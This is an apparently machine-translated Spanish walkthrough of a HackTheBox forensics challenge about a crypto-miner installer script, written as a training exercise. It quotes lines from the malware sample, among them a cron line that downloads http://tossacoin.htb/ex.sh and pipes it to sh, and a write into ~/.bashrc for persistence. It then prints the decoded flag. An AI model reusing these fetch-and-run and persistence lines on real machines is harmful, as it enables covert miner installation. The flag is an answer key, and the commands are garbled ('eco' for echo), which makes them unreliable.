Descripción

En la carrera por Vitalium en Marte, la malvada Junta de Arodor recurrió a medidas desesperadas, necesitando fondos para sus intentos de minería. Idearon una botnet diseñada específicamente para extraer criptomonedas de forma encubierta. Nos topamos con una muestra del instalador del minero de Arodor en nuestro servidor. Reconociendo la gravedad de la situación, iniciamos una investigación exhaustiva. Contigo como líder, necesitas desentrañar el funcionamiento interno del mecanismo de instalación. El descubrimiento sirvió como un punto de inflexión y reveló el alcance de la desesperación de Arodor. Sin embargo, la batalla por Vitalium continuó, instándonos a permanecer alerta y adaptar nuestras ciberdefensas para contrarrestar futuras amenazas.

Obtenga notas del certificado OSCP

El curso completo y práctico de pruebas de penetración de aplicaciones web

El desafío muestra un script bash muy largo que tiene algunas cadenas codificadas en base64 como las que se muestran a continuación

URL local =”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”

destino=$(echo “X3QwX200cnN9Cg==”|base64 -d)

eco “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc

eco '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'

Todo lo que tenemos que hacer es decodificar en base64 esas cadenas y reunir las partes que componen la bandera final.

$ eco cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d

$ eco “X3QwX200cnN9Cg==”|base64 -d

$ eco “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d

$ eco -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d

Bandera final

HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}

Lista de reproducción de tutoriales en vídeo de HackTheBox

Acerca del Autor

Creo notas de ciberseguridad, notas de marketing digital y cursos online. También brindo consultoría de marketing digital que incluye, entre otros, SEO, Google y meta anuncios y administración de CRM.

Ver Artículos